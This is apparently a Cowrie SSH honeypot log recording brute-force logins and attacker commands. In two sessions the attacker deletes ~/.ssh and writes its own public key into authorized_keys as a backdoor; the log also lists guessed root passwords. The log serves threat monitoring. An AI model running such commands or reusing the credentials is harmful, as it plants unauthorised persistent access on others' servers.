{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.533330Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.534181Z","src_ip":"81.45.181.135","session":"f41ea600872c"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.543329Z","src_ip":"212.227.235.229","session":"b84f741466f2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:42.674890Z","src_ip":"212.227.235.229","session":"b84f741466f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53776,"dst_ip":"1.2.3.4","dst_port":22,"session":"980e6ae01296","protocol":"ssh","message":"New connection: 212.227.235.229:53776 (1.2.3.4:22) [session: 980e6ae01296]","sensor":"my-vps","timestamp":"2025-08-26T03:42:26.509088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:42:26.510006Z","src_ip":"212.227.235.229","session":"980e6ae01296"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:42:26.757364Z","src_ip":"212.227.235.229","session":"980e6ae01296"}
{"eventid":"cowrie.login.failed","username":"master","password":"1234","message":"login attempt [master/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T03:42:27.788636Z","src_ip":"212.227.235.229","session":"980e6ae01296"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:42:29.038866Z","src_ip":"212.227.235.229","session":"980e6ae01296"}
{"eventid":"cowrie.session.connect","src_ip":"51.159.199.236","src_port":37036,"dst_ip":"1.2.3.4","dst_port":22,"session":"3016afc83421","protocol":"ssh","message":"New connection: 51.159.199.236:37036 (1.2.3.4:22) [session: 3016afc83421]","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.297008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.298030Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.323385Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123456@","message":"login attempt [root/admin123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.467595Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:43:38.571152Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.572105Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.573448Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.600719Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:43:38.725718Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.726687Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.754858Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.755931Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.session.connect","src_ip":"51.159.199.236","src_port":37040,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0739af93ab0","protocol":"ssh","message":"New connection: 51.159.199.236:37040 (1.2.3.4:22) [session: b0739af93ab0]","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.777877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.778888Z","src_ip":"51.159.199.236","session":"b0739af93ab0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.802962Z","src_ip":"51.159.199.236","session":"b0739af93ab0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:43:38.943172Z","src_ip":"51.159.199.236","session":"b0739af93ab0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:43:39.968804Z","src_ip":"51.159.199.236","session":"b0739af93ab0"}
{"eventid":"cowrie.session.connect","src_ip":"51.159.199.236","src_port":37042,"dst_ip":"1.2.3.4","dst_port":22,"session":"9da9d9b50781","protocol":"ssh","message":"New connection: 51.159.199.236:37042 (1.2.3.4:22) [session: 9da9d9b50781]","sensor":"my-vps","timestamp":"2025-08-26T03:43:39.993290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:43:39.993868Z","src_ip":"51.159.199.236","session":"9da9d9b50781"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:43:40.019091Z","src_ip":"51.159.199.236","session":"9da9d9b50781"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:43:40.163733Z","src_ip":"51.159.199.236","session":"9da9d9b50781"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:43:40.192558Z","src_ip":"51.159.199.236","session":"3016afc83421"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:43:40.193388Z","src_ip":"51.159.199.236","session":"9da9d9b50781"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55266,"dst_ip":"1.2.3.4","dst_port":22,"session":"29c3f2f46852","protocol":"ssh","message":"New connection: 212.227.235.229:55266 (1.2.3.4:22) [session: 29c3f2f46852]","sensor":"my-vps","timestamp":"2025-08-26T03:43:51.337374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:43:51.338749Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:43:51.581812Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:43:53.214491Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:43:53.729988Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:43:53.730870Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:43:53.731899Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:43:53.977318Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:43:54.570845Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:43:54.571621Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:43:54.824087Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:43:54.825175Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55282,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac37517ffc75","protocol":"ssh","message":"New connection: 212.227.235.229:55282 (1.2.3.4:22) [session: ac37517ffc75]","sensor":"my-vps","timestamp":"2025-08-26T03:43:55.068991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:43:55.069568Z","src_ip":"212.227.235.229","session":"ac37517ffc75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:43:56.291067Z","src_ip":"212.227.235.229","session":"ac37517ffc75"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:43:57.030186Z","src_ip":"212.227.235.229","session":"ac37517ffc75"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:43:58.286000Z","src_ip":"212.227.235.229","session":"ac37517ffc75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39746,"dst_ip":"1.2.3.4","dst_port":22,"session":"10f55f7336ac","protocol":"ssh","message":"New connection: 212.227.235.229:39746 (1.2.3.4:22) [session: 10f55f7336ac]","sensor":"my-vps","timestamp":"2025-08-26T03:43:58.544410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:43:58.545322Z","src_ip":"212.227.235.229","session":"10f55f7336ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:43:58.796697Z","src_ip":"212.227.235.229","session":"10f55f7336ac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:44:00.494467Z","src_ip":"212.227.235.229","session":"10f55f7336ac"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:44:00.740297Z","src_ip":"212.227.235.229","session":"29c3f2f46852"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:44:00.747933Z","src_ip":"212.227.235.229","session":"10f55f7336ac"}
